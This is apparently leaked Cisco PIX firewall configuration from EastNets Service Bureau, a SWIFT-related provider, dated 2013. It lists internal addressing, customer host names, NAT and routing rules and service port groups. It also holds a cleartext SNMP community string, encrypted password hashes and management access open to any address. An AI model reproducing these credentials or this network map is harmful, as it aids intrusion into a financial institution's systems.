+pdm location pg-sslvpn-nw 255.255.255.0 clients
+pdm location 10.153.2.0 255.255.255.192 clients
+pdm location endssdb1 255.255.255.255 smartstream
+pdm location endssapp1 255.255.255.255 smartstream
+pdm location ins-sslvpn-nw 255.255.255.0 clients
+pdm location 10.149.0.0 255.255.0.0 clients
+pdm location ss-client-nw 255.255.0.0 clients
+pdm location 10.71.0.0 255.255.0.0 clients
+pdm location 10.72.0.0 255.255.0.0 clients
+pdm location 10.153.0.64 255.255.255.192 clients
+pdm location ensbdnbcr1 255.255.255.255 host
+pdm location ensbdnbcr2 255.255.255.255 host
+pdm location fmhs-sslvpn-nw 255.255.255.0 clients
+pdm location sl3 255.255.255.255 host
+pdm location 192.168.219.0 255.255.255.0 host
+pdm location 10.154.9.128 255.255.255.192 clients
+pdm location ftp 255.255.255.255 host
+pdm location 192.168.211.0 255.255.255.0 clients
+pdm location 172.28.0.0 255.255.0.0 host
+pdm location 192.168.200.208 255.255.255.255 host
+pdm location 192.168.209.0 255.255.255.0 host
+pdm location 192.168.200.32 255.255.255.255 host
+pdm location 192.168.200.4 255.255.255.255 host
+pdm location 192.168.200.100 255.255.255.255 host
+pdm location 192.168.211.0 255.255.255.0 host
+pdm location 192.168.200.15 255.255.255.255 host
+pdm location 192.168.211.15 255.255.255.255 host
+pdm location 192.168.200.17 255.255.255.255 host
+pdm location 192.168.202.249 255.255.255.255 mgmt
+pdm location 192.168.106.0 255.255.254.0 clients
+pdm location ensbdtasw1 255.255.255.255 dmz
+pdm location 10.149.105.201 255.255.255.255 clients
+pdm location 10.149.105.202 255.255.255.255 clients
+pdm location 10.149.105.203 255.255.255.255 clients
+pdm location 192.168.203.113 255.255.255.255 dmz
+pdm location 192.168.203.114 255.255.255.255 dmz
+pdm location 10.15.0.0 255.255.255.0 clients
+pdm location 10.14.0.0 255.255.255.0 clients
+pdm location 10.31.5.130 255.255.255.255 clients
+pdm location 10.33.10.202 255.255.255.255 clients
+pdm location 10.33.14.0 255.255.255.0 clients
+pdm location 10.40.5.32 255.255.255.255 clients
+pdm location 10.40.5.63 255.255.255.255 clients
+pdm location 10.40.6.0 255.255.255.0 clients
+pdm location 10.40.14.201 255.255.255.255 clients
+pdm location 10.41.5.32 255.255.255.255 clients
+pdm location 10.41.6.1 255.255.255.255 clients
+pdm location qfqf-gnat-nw 255.255.255.192 clients
+pdm location 0.0.0.0 255.255.255.255 mgmt
+pdm location ensbdmgmt1 255.255.255.255 mgmt
+pdm location ensbdmgmt2 255.255.255.255 mgmt
+pdm location ensbdmgmt2 255.255.255.255 host
+pdm group smartstream-srv-group smartstream
+pdm logging informational 100
+pdm history enable
+arp timeout 14400
+nat (host) 0 192.168.211.15 255.255.255.255 0 0
+static (dmz,host) 192.168.200.220 192.168.203.220 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.225 192.168.203.225 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.235 192.168.203.235 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.230 192.168.203.230 netmask 255.255.255.255 0 0 
+static (paygate,dmz) 192.168.203.201 pg-arcapita netmask 255.255.255.255 0 0 
+static (paygate,dmz) 192.168.203.203 192.168.201.203 netmask 255.255.255.255 0 0 
+static (paygate,dmz) 192.168.203.205 pg-dgcx netmask 255.255.255.255 0 0 
+static (paygate,dmz) 192.168.203.207 pg-qtel netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.208.12 192.168.201.112 netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.35 192.168.201.35 netmask 255.255.255.255 0 0 
+static (host,paygate) pg-arcapita 192.168.200.201 netmask 255.255.255.255 0 0 
+static (paygate,clients) 192.168.206.201 pg-arcapita netmask 255.255.255.255 0 0 
+static (paygate,clients) 192.168.206.203 192.168.201.203 netmask 255.255.255.255 0 0 
+static (paygate,clients) 192.168.206.205 pg-dgcx netmask 255.255.255.255 0 0 
+static (paygate,clients) 192.168.206.207 pg-qtel netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.201 pg-arcapita netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.203 192.168.201.203 netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.205 pg-dgcx netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.207 pg-qtel netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.220 192.168.203.220 netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.225 192.168.203.225 netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.230 192.168.203.230 netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.235 192.168.203.235 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.35 192.168.200.35 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.59 192.168.200.59 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.71 192.168.200.71 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.33 192.168.200.33 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.34 192.168.200.34 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.71 192.168.200.71 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.20 192.168.200.20 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.22 192.168.200.22 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.25 192.168.200.25 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.72 192.168.200.72 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.72 192.168.200.72 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.95 192.168.200.95 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.96 192.168.200.96 netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.10 192.168.201.110 netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.11 192.168.201.111 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.111 192.168.200.11 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.110 192.168.200.10 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.203.111 192.168.200.11 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.10 192.168.203.110 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.11 192.168.203.111 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.13 192.168.203.113 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.14 192.168.203.114 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.110 192.168.200.10 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.111 192.168.200.11 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.53 192.168.200.51 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.51 192.168.200.52 netmask 255.255.255.255 0 0 
+static (smartstream,clients) 192.168.206.208 endssapp1 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.53 192.168.200.51 netmask 255.255.255.255 0 0 
+static (dmz,smartstream) 192.168.218.230 192.168.203.230 netmask 255.255.255.255 0 0 
+static (smartstream,clients) 192.168.206.209 endssdb1 netmask 255.255.255.255 0 0 
+static (smartstream,host) 192.168.200.209 endssdb1 netmask 255.255.255.255 0 0 
+static (smartstream,host) 192.168.200.208 endssapp1 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.110 192.168.200.10 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.165 ensbdnbcr1 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.166 ensbdnbcr2 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.104 sl3 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.245 ftp netmask 255.255.255.255 0 0 
+static (host,smartstream) endssapp1 192.168.200.208 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.32 192.168.200.32 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.25 192.168.200.25 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.4 192.168.200.4 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.15 192.168.200.15 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.17 192.168.200.17 netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.215 ensbdtasw1 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.51 192.168.200.52 netmask 255.255.255.255 0 0 
+static (mgmt,smartstream) 192.168.218.10 ensbdmgmt1 netmask 255.255.255.255 0 0 
+static (mgmt,smartstream) 192.168.218.11 ensbdmgmt2 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.111 192.168.200.11 netmask 255.255.255.255 0 0 
+access-group clients_access_in in interface clients
+access-group paygate_access_in in interface paygate
+access-group host_access_in in interface host
+access-group dmz_access_in in interface dmz
+access-group smartstream_access_in in interface smartstream
+access-group mgmt_access_in in interface mgmt
+route clients 0.0.0.0 0.0.0.0 192.168.206.4 1
+route clients 0.0.0.0 0.0.0.0 192.168.206.5 15
+route clients 10.14.0.0 255.255.255.0 192.168.206.5 2
+route clients 10.15.0.0 255.255.255.0 192.168.206.5 2
+route clients 10.31.5.130 255.255.255.255 192.168.206.5 2
+route clients 10.33.10.202 255.255.255.255 192.168.206.5 2
+route clients 10.33.14.0 255.255.255.0 192.168.206.5 2
+route clients 10.40.5.32 255.255.255.255 192.168.206.5 2
+route clients 10.40.5.63 255.255.255.255 192.168.206.5 2
+route clients 10.40.6.0 255.255.255.0 192.168.206.5 2
+route clients 10.40.14.201 255.255.255.255 192.168.206.5 2
+route clients 10.41.5.32 255.255.255.255 192.168.206.5 2
+route clients 10.41.6.1 255.255.255.255 192.168.206.5 2
+route clients 10.71.120.0 255.255.255.0 192.168.206.27 1
+route clients 10.72.110.0 255.255.255.0 192.168.206.6 1
+route clients 10.72.110.0 255.255.255.0 192.168.206.27 10
+route clients 10.149.0.0 255.255.0.0 192.168.206.7 2
+route clients 10.153.0.64 255.255.255.192 192.168.206.4 1
+route clients 10.153.2.0 255.255.255.192 192.168.206.4 1
+route clients 10.154.0.0 255.255.0.0 192.168.206.4 2
+route clients 10.154.9.128 255.255.255.192 192.168.206.4 1
+route host 172.28.0.0 255.255.0.0 192.168.200.1 2
+route clients 192.168.106.0 255.255.254.0 192.168.206.4 2
+route host 192.168.209.0 255.255.255.0 192.168.200.1 2
+route host 192.168.211.0 255.255.255.0 192.168.200.1 2
+route host 192.168.211.15 255.255.255.255 192.168.200.1 1
+route host 192.168.219.0 255.255.255.0 192.168.200.1 1
+timeout xlate 3:00:00
+timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h225 1:00:00
+timeout h323 0:05:00 mgcp 0:05:00 sip 0:30:00 sip_media 0:02:00
+timeout sip-disconnect 0:02:00 sip-invite 0:03:00
+timeout uauth 0:05:00 absolute
+aaa-server TACACS+ protocol tacacs+ 
+aaa-server TACACS+ max-failed-attempts 3 
+aaa-server TACACS+ deadtime 10 
+aaa-server RADIUS protocol radius 
+aaa-server RADIUS max-failed-attempts 3 
+aaa-server RADIUS deadtime 10 
+aaa-server LOCAL protocol local 
+http server enable
+http 0.0.0.0 0.0.0.0 clients
+http 192.168.201.110 255.255.255.255 paygate
+http 0.0.0.0 0.0.0.0 paygate
+http 0.0.0.0 0.0.0.0 host
+http 0.0.0.0 0.0.0.0 dmz
+http 192.168.208.0 255.255.255.0 mgmt
+snmp-server host mgmt ensbdmgmt2
+no snmp-server location
+no snmp-server contact
+snmp-server community ^enSBSXstr1ng^
+snmp-server enable traps
+tftp-server mgmt ensbdmgmt1 /
+floodguard enable
+telnet 192.168.202.249 255.255.255.255 clients
+telnet 0.0.0.0 0.0.0.0 paygate
+telnet 192.168.202.249 255.255.255.255 paygate
+telnet 0.0.0.0 0.0.0.0 host
+telnet 192.168.202.249 255.255.255.255 host
+telnet 192.168.202.249 255.255.255.255 dmz
+telnet 0.0.0.0 0.0.0.0 mgmt
+telnet timeout 5
+ssh timeout 5
+console timeout 0
+terminal width 80
+banner login EastNets Service Bureau
+banner login NOTICE TO USERS
+banner login This computer is a property of EastNets (R). Any or all use of this system is governed by the Security Policies of EastNets Service Bureau (ENSB).
+banner login Any or all uses of this system, and all files on this system may be monitored, recorded, audited, or inspected  at the discretion of EastNets Management.
+banner login Unauthorized or improper use of this system may result in administrative disciplinary action and civil and criminal penalties. By continuing to use this system you indicate your awareness of and consent to these terms and conditions of use. LOG OFF IMMEDIATELY if you do not agree to the conditions stated in this warning.
+banner login Please contact ENSB Infrastructure Team to obtain a copy of the Security Policy or visit ENSB portal at http://entranet.eastnets.com/sites/ENSB/.
+Cryptochecksum:81a3d0a8ba7c3afa7d90a8b63f00e307
+: end

swift/00725_0_ensbdpix4-31aug2013

@@ -0,0 +1,933 @@
+: Saved
+: Written by enable_15 at 06:29:09.551 UTC Sun Sep 1 2013
+!
+PIX Version 8.0(2) 
+!
+hostname ENSBUSPIX
+domain-name sag
+enable password Ro5XpDeSuehPBEdi encrypted
+names
+name 192.168.202.20 sag-srv2
+name 192.168.211.17 vpn1-2-nsrp
+name 192.168.211.16 vpn2-int
+name 192.168.211.15 vpn1-int
+name 172.28.0.70 FEBKUS6L-LA-ws2
+name 172.28.0.71 FEBKUS6L-LA-ws3
+name 172.28.0.72 FEBKUS6L-LA-ws4
+name 172.28.0.73 FEBKUS6L-LA-ws5
+name 172.28.0.74 FEBKUS6L-LA-ws6
+name 172.28.0.199 FEBKUS6L-IR-ws3
+name 172.28.0.200 FEBKUS6L-IR-ws4
+name 172.28.0.201 FEBKUS6L-IR-ws5
+name 172.28.0.202 FEBKUS6L-IR-ws6
+name 172.28.0.203 FEBKUS6L-IR-ws7
+name 10.100.200.0 ensb-mgmt-nw
+name 192.168.211.0 ensb-dxb-nw
+name 192.168.211.50 host-srv1
+name 192.168.211.51 host-srv2
+name 192.168.211.52 host-srv3
+name 172.28.0.197 FEBKUS6L-IR-ws1
+name 172.28.0.198 FEBKUS6L-IR-ws2
+name 172.28.0.69 FEBKUS6L-LA-ws1
+name 172.28.0.75 FEBKUS6L-LA-ws7
+name 192.168.111.0 ensb-us-nw description US Network
+name 192.168.213.201 unirisx-srv1
+name 10.100.205.0 unirisx-mgmt-nw
+name 192.168.213.202 unirisx-srv2
+name 192.168.213.203 unirisx-srv3
+name 172.28.1.68 IDXDUS33-ws1
+name 172.28.1.69 IDXDUS33-ws2
+name 172.28.1.70 IDXDUS33-ws3
+name 10.100.210.0 unirisx-pharos-nw description Unirisx-Pharos Dial-in IP Pool
+name 192.168.209.52 ensbusl3
+name 192.168.209.50 ensbusl1
+name 192.168.209.51 ensbusl2
+name 192.168.208.0 ensb-dxb-mgmt-nw
+name 172.28.1.133 RBBCUS6L-ws1
+name 172.28.1.134 RBBCUS6L-ws2
+name 192.168.214.100 finmex-srv1 description Finmex Portal Server1
+name 10.100.215.0 finmex-mgmt-nw description finmex-mgmt-pool
+name 172.28.1.193 GPSXUS55-loopback
+name 172.28.1.194 GPSXUS55-mgmt1
+name 172.28.1.195 GPSXUS55-mgmt2
+name 172.28.1.196 GPSXUS55-nsrp
+name 172.28.1.198 GPSXUS55-ws1
+name 172.28.1.199 GPSXUS55-ws2
+name 172.28.1.200 GPSXUS55-ws3
+name 172.28.1.201 GPSXUS55-ws4
+name 172.28.1.202 GPSXUS55-ws5
+name 172.28.1.135 RBBCUS6L-ws3
+name 172.28.1.136 RBBCUS6L-ws4
+name 172.28.2.129 CAGPBMHM-LB
+name 192.168.209.31 CAGP-SRV1
+name 192.168.209.32 CAGP-SRV2
+name 192.168.226.0 ensb-jo-nw
+name 172.28.2.130 CAGPBMHM-MGMT-VPN1-OLD
+name 172.28.2.132 CAGPBMHM-NSRP-OLD
+name 10.149.10.0 nw-sslvpn-nw description ENSBNW SSLVPN IP
+name 192.168.202.25 sagfin1
+name 192.168.202.26 sagfin2
+name 192.168.202.22 sagsns1
+name 192.168.202.23 sagsns2
+name 192.168.202.21 sagtest1
+name 206.201.131.9 UNIRISX-KEYSRV
+name 192.168.214.105 enMORE-srvr1
+name 4.3.2.0 Vitname-NW
+name 192.168.202.245 enFTP1
+name 193.43.238.250 BICs-HomeSend-Test
+name 193.43.238.249 BICs-HomeSend-Prod
+name 192.168.214.51 SL1
+name 192.168.202.30 swp-nlb
+name 192.168.202.28 swp-srv1
+name 192.168.202.29 swp-srv2
+name 192.168.214.106 enMORE-srvr2
+name 10.100.220.0 cs-support-nw
+name 192.168.214.107 enMORE-srvr3
+name 192.168.214.108 enMORE-srvr4
+name 192.168.211.230 en.MoreWebSRVR1 description en.More Web Server 1
+name 84.45.85.251 RemitONE-Srvr1 description RemitONE Public IP 1
+name 84.45.85.253 RemitONE-Srvr2 description RemitONE Public IP 2
+name 84.45.85.222 RemitONE-Test_Srvr1 description RemitONE Public IP 3
+name 84.45.85.199 RemitONE-Srvr3
+name 84.45.85.195 RemitONE-Srvr4
+name 192.168.202.101 ensbdrsa2
+dns-guard
+!
+interface Ethernet0
+ nameif clients
+ security-level 10
+ ip address 192.168.211.1 255.255.255.0 
+!
+interface Ethernet1
+ nameif host
+ security-level 70
+ ip address 192.168.209.1 255.255.255.0 
+!
+interface Ethernet2
+ nameif sag
+ security-level 80
+ ip address 192.168.202.4 255.255.255.0 
+!
+interface Ethernet3
+ description unirisx zone
+ nameif unirisx
+ security-level 30
+ ip address 192.168.213.1 255.255.255.0 
+!
+interface Ethernet4
+ description mgmt zone
+ nameif mgmt
+ security-level 50
+ ip address 192.168.208.4 255.255.255.0 
+!
+interface Ethernet5
+ no nameif
+ no security-level
+ no ip address
+!
+interface Ethernet5.1
+ description Finemx Portal Interface
+ vlan 214
+ nameif finmex
+ security-level 20
+ ip address 192.168.214.1 255.255.255.0 
+!
+passwd Ro5XpDeSuehPBEdi encrypted
+banner login EastNets Service Bureau
+banner login NOTICE TO USERS
+banner login This computer is a property of EastNets (R). Any or all use of this system is governed by the Security Policies of EastNets Service Bureau (ENSB).
+banner login Any or all uses of this system, and all files on this system may be monitored, recorded, audited, or inspected  at the discretion of EastNets Management.
+banner login Unauthorized or improper use of this system may result in administrative disciplinary action and civil and criminal penalties. By continuing to use this system you indicate your awareness of and consent to these terms and conditions of use. LOG OFF IMMEDIATELY if you do not agree to the conditions stated in this warning.
+banner login Please contact ENSB Infrastructure Team to obtain a copy of the Security Policy or visit ENSB portal at http://entranet.eastnets.com/sites/ENSB/.
+ftp mode passive
+dns domain-lookup clients
+dns domain-lookup host
+dns domain-lookup sag
+dns domain-lookup unirisx
+dns domain-lookup mgmt
+dns domain-lookup finmex
+dns server-group DefaultDNS
+ domain-name sag
+object-group network sag-servers-prod
+ network-object host sagsns1
+ network-object host sagfin2
+object-group network ensb-vpns-group
+ network-object vpn1-int 255.255.255.255
+ network-object vpn2-int 255.255.255.255
+ network-object vpn1-2-nsrp 255.255.255.255
+object-group service msih-ports-udp udp
+ port-object range 9000 9059
+ port-object range 48200 48200
+ port-object range 48100 48105
+ port-object range 135 135
+ port-object range 48002 48009
+ port-object range 6500 6501
+ port-object range 1029 1029
+object-group service msih-ports-udp-casmf udp
+ port-object range 5101 5105
+ port-object range 5206 5207
+object-group service swift-dns-port udp
+ port-object range domain domain
+object-group service symantec-av udp
+ port-object range 38293 38293
+ port-object range 2967 2967
+object-group service FMSIH-OUT-TCP tcp
+ port-object range 9100 9106
+ port-object range 6500 6501
+object-group service FMSIH-OUT-TCP-CASMF tcp
+ group-object FMSIH-OUT-TCP
+ port-object range 5206 5207
+ port-object range 5101 5105
+object-group service FMSIH-PRINT-TCP tcp
+ port-object range 9100 9106
+object-group service msih-ports-tcp tcp
+ port-object range 9000 9059
+ port-object range 48200 48200
+ port-object range 48100 48105
+ port-object range 135 135
+ port-object range 48009 48009
+ port-object range 6500 6501
+ port-object range 1029 1029
+ port-object eq ssh
+object-group service msih-ports-tcp-casmf tcp
+ group-object msih-ports-tcp
+ port-object range 5206 5207
+ port-object range 5101 5105
+object-group service snmp tcp-udp
+ port-object range 161 162
+object-group service doubletake tcp-udp
+ port-object range 1105 1106
+ port-object range 1100 1100
+object-group service msih-ports tcp-udp
+ port-object range 48200 48200
+ port-object range 48100 48105
+ port-object range 135 135
+ port-object range 48009 48009
+ port-object range 6500 6501
+ port-object range 9000 9049
+ port-object range 1029 1029
+object-group service shared-ports tcp
+ port-object range 445 445
+ port-object range netbios-ssn netbios-ssn
+ port-object range 137 137
+ port-object eq 138
+object-group service swift-49168-9 tcp
+ port-object range 49168 49169
+object-group service swift-cara-port tcp
+ port-object range 709 709
+object-group service swift-dialup-port tcp
+ port-object eq www
+object-group service swift-direcotry-ports tcp
+ port-object range 1400 1409
+ port-object range 1600 1609
+ port-object range 1100 1109
+ port-object range ldap ldap
+ port-object range 1300 1309
+ port-object range 1500 1509
+ port-object range 1200 1209
+object-group service swift-myswift-webserver-port tcp
+ port-object range https https
+object-group service swift-rvs-port tcp
+ port-object range 49170 49170
+object-group service swift-secrets-webserver-port tcp
+ port-object range 49172 49172
+object-group service swift-switch-ports tcp
+ port-object range 50153 50190
+ port-object range 52100 52399
+ port-object range 49500 49510
+ port-object range 50200 50806
+object-group service swift-web-connector-ports tcp
+ port-object eq www
+ port-object range 49171 49171
+object-group service vnc-port tcp
+ port-object range 5800 5800
+ port-object range 5900 5900
+object-group network sag-srv-test
+ network-object sagsns1 255.255.255.255
+object-group network sag-servers-prod_ref
+ network-object 192.168.246.20 255.255.255.255
+ network-object 192.168.246.25 255.255.255.255
+ network-object 192.168.209.25 255.255.255.255
+ network-object 192.168.209.20 255.255.255.255
+object-group network ensb-dxb-nw
+ network-object ensb-dxb-nw 255.255.255.0
+object-group service web-ports tcp
+ port-object eq www
+ port-object eq https
+object-group network sag-servers-prod1
+ network-object sag-srv2 255.255.255.255
+ network-object sagfin1 255.255.255.255
+object-group network sag-servers-prod_ref_1
+ network-object 192.168.211.25 255.255.255.255
+ network-object 192.168.211.20 255.255.255.255
+object-group network FEBKUS6L-ws-nw
+ network-object FEBKUS6L-LA-ws2 255.255.255.255
+ network-object FEBKUS6L-LA-ws3 255.255.255.255
+ network-object FEBKUS6L-LA-ws4 255.255.255.255
+ network-object FEBKUS6L-LA-ws5 255.255.255.255
+ network-object FEBKUS6L-LA-ws6 255.255.255.255
+ network-object FEBKUS6L-LA-ws7 255.255.255.255
+ network-object FEBKUS6L-IR-ws2 255.255.255.255
+ network-object FEBKUS6L-IR-ws3 255.255.255.255
+ network-object FEBKUS6L-IR-ws4 255.255.255.255
+ network-object FEBKUS6L-IR-ws5 255.255.255.255
+ network-object FEBKUS6L-IR-ws6 255.255.255.255
+ network-object FEBKUS6L-IR-ws7 255.255.255.255
+ network-object FEBKUS6L-LA-ws1 255.255.255.255
+ network-object host FEBKUS6L-IR-ws1
+object-group network sharedsaa-saa-group
+ network-object host host-srv1
+ network-object host host-srv2
+ network-object host host-srv3
+object-group network ensb-mgmt-nw
+ network-object ensb-mgmt-nw 255.255.255.0
+ network-object ensb-dxb-nw 255.255.255.0
+ network-object ensb-dxb-mgmt-nw 255.255.255.0
+object-group protocol TCPUDP
+ protocol-object udp
+ protocol-object tcp
+object-group protocol DM_INLINE_PROTOCOL_2
+ protocol-object udp
+ protocol-object tcp
+object-group network ensb-us-nw
+ network-object ensb-us-nw 255.255.255.0
+object-group network unirisx-srv-group
+ network-object host 192.168.211.201
+ network-object host 192.168.211.202
+ network-object host 192.168.211.203
+object-group network unirisx-mgmt-group
+ network-object unirisx-mgmt-nw 255.255.255.0
+object-group service RDP tcp
+ port-object eq 3389
+object-group network IDXDUS33-nw
+ network-object host IDXDUS33-ws1
+ network-object host IDXDUS33-ws2
+ network-object host IDXDUS33-ws3
+object-group network unirisx-pharos-group
+ network-object unirisx-pharos-nw 255.255.255.0
+object-group network DM_INLINE_NETWORK_1
+ network-object host ensbusl1
+ network-object host ensbusl2
+ network-object host ensbusl3
+ network-object host CAGP-SRV1
+ network-object host CAGP-SRV2
+object-group network DM_INLINE_NETWORK_2
+ network-object host ensbusl1
+ network-object host ensbusl2
+ network-object host ensbusl3
+ network-object host CAGP-SRV1
+ network-object host CAGP-SRV2
+object-group network DM_INLINE_NETWORK_3
+ network-object host unirisx-srv1
+ network-object host unirisx-srv2
+ network-object host unirisx-srv3
+object-group network DM_INLINE_NETWORK_4
+ network-object host unirisx-srv1
+ network-object host unirisx-srv2
+ network-object host unirisx-srv3
+object-group network RBBCUS6L-ws-nw
+ network-object host RBBCUS6L-ws1
+ network-object host RBBCUS6L-ws2
+ network-object host RBBCUS6L-ws3
+ network-object host RBBCUS6L-ws4
+object-group network finmex-mgmt-group
+ network-object finmex-mgmt-nw 255.255.255.0
+object-group service DM_INLINE_SERVICE_1
+ service-object icmp 
+ service-object tcp eq smtp 
+object-group network GPSXUS55-nw
+ network-object host GPSXUS55-loopback
+ network-object host GPSXUS55-mgmt1
+ network-object host GPSXUS55-mgmt2
+ network-object host GPSXUS55-nsrp
+ network-object host GPSXUS55-ws1
+ network-object host GPSXUS55-ws2
+ network-object host GPSXUS55-ws3
+ network-object host GPSXUS55-ws4
+ network-object host GPSXUS55-ws5
+object-group network CAGPBMHM-nw
+ network-object host CAGPBMHM-NSRP-OLD
+ network-object host 172.28.2.133
+ network-object host 172.28.2.134
+ network-object host 172.28.2.135
+ network-object host 172.28.2.136
+ network-object host 172.28.2.137
+ network-object host 172.28.2.138
+ network-object host 172.28.2.139
+ network-object host 172.28.2.140
+ network-object host 172.28.2.141
+ network-object host 172.28.2.142
+ network-object host 172.28.2.143
+ network-object host 172.28.2.144
+ network-object host 172.28.2.145
+ network-object host CAGPBMHM-LB
+ network-object host CAGPBMHM-MGMT-VPN1-OLD
+ network-object host 172.28.2.146
+ network-object host 172.28.2.147
+ network-object host 172.28.2.148
+ network-object host 172.28.2.149
+ network-object host 172.28.2.150
+ network-object host 172.28.2.151
+ network-object host 172.28.2.152
+ network-object host 172.28.2.153
+ network-object host 172.28.2.154
+ network-object host 172.28.2.157
+ network-object host 172.28.2.158
+ network-object host 172.28.2.159
+ network-object host 172.28.2.160
+ network-object host 172.28.2.161
+ network-object host 172.28.2.162
+ network-object host 172.28.2.163
+ network-object host 172.28.2.164
+ network-object host 172.28.2.165
+ network-object host 172.28.2.166
+ network-object host 172.28.2.167
+ network-object host 172.28.2.168
+ network-object host 172.28.2.169
+ network-object host 172.28.2.170
+ network-object host 172.28.2.171
+ network-object host 172.28.2.173
+ network-object host 172.28.2.174
+ network-object host 172.28.2.172
+ network-object host 172.28.2.175
+ network-object host 172.28.2.176
+ network-object host 172.28.2.177
+object-group network CAGP-SRV-GROUP
+ network-object host CAGP-SRV1
+ network-object host CAGP-SRV2
+object-group service sidestation tcp
+ port-object eq 8401
+object-group service sql tcp
+ port-object eq 1433
+object-group service DM_INLINE_TCP_1 tcp
+ group-object msih-ports
+ port-object eq ftp
+ port-object eq ssh
+ group-object sidestation
+ group-object sql
+object-group network CAPG-SRV-GROUP-NAT
+ network-object host 192.168.211.31
+ network-object host 192.168.211.32
+object-group service Unirisx-Keysrv tcp
+ description keyserver.hostidp.com on TCP port 18021
+ port-object eq 18201
+object-group network DM_INLINE_NETWORK_5
+ group-object sag-servers-prod
+ group-object sag-servers-prod1
+object-group network en.More-srvr
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network en.More-srvr_ref
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host 192.168.211.107
+ network-object host 192.168.211.108
+ network-object host enMORE-srvr4
+ network-object host enMORE-srvr3
+object-group network CAGPBMHM-NW-DR
+ network-object 172.28.2.192 255.255.255.192
+object-group service DM_INLINE_TCP_3 tcp
+ group-object msih-ports
+ group-object sidestation
+ group-object sql
+ port-object eq ftp
+ port-object eq ssh
+object-group network en.More_Customers
+ network-object Vitname-NW 255.255.255.0
+object-group service DM_INLINE_TCP_2 tcp
+ port-object eq 4443
+ port-object eq 7777
+ port-object eq 8080
+ port-object eq 8081
+ port-object eq www
+ port-object eq https
+ port-object eq ftp
+ port-object eq ftp-data
+object-group service DM_INLINE_TCP_4 tcp
+ port-object eq 4443
+ port-object eq 7777
+ port-object eq 8080
+ port-object eq 8081
+ port-object eq www
+ port-object eq https
+ port-object eq ftp
+ port-object eq ftp-data
+object-group service DM_INLINE_TCP_5 tcp
+ port-object eq ftp
+ port-object eq ftp-data
+ port-object eq ssh
+object-group service shared-ports-udp udp
+ port-object eq 139
+ port-object eq 445
+ port-object eq netbios-dgm
+ port-object eq netbios-ns
+object-group service DM_INLINE_TCP_7 tcp
+ port-object eq ftp
+ port-object eq ftp-data
+ port-object eq ssh
+object-group network ftp-srv_ref-clients
+ network-object host 192.168.211.115
+object-group network ftp-srv_ref-finmex
+ network-object host 192.168.214.245
+object-group network DM_INLINE_NETWORK_6
+ network-object host BICs-HomeSend-Prod
+ network-object host BICs-HomeSend-Test
+object-group network DM_INLINE_NETWORK_7
+ network-object host BICs-HomeSend-Prod
+ network-object host BICs-HomeSend-Test
+object-group service DM_INLINE_TCP_6 tcp
+ port-object eq ftp
+ port-object eq ftp-data
+ port-object eq ssh
+object-group service DM_INLINE_SERVICE_2
+ service-object tcp eq www 
+ service-object tcp eq https 
+ service-object tcp-udp eq domain 
+object-group service DM_INLINE_TCP_8 tcp
+ port-object eq 3389
+ port-object eq www
+ port-object eq https
+object-group service DM_INLINE_TCP_9 tcp
+ port-object eq www
+ port-object eq https
+object-group service DM_INLINE_TCP_10 tcp
+ port-object eq ftp
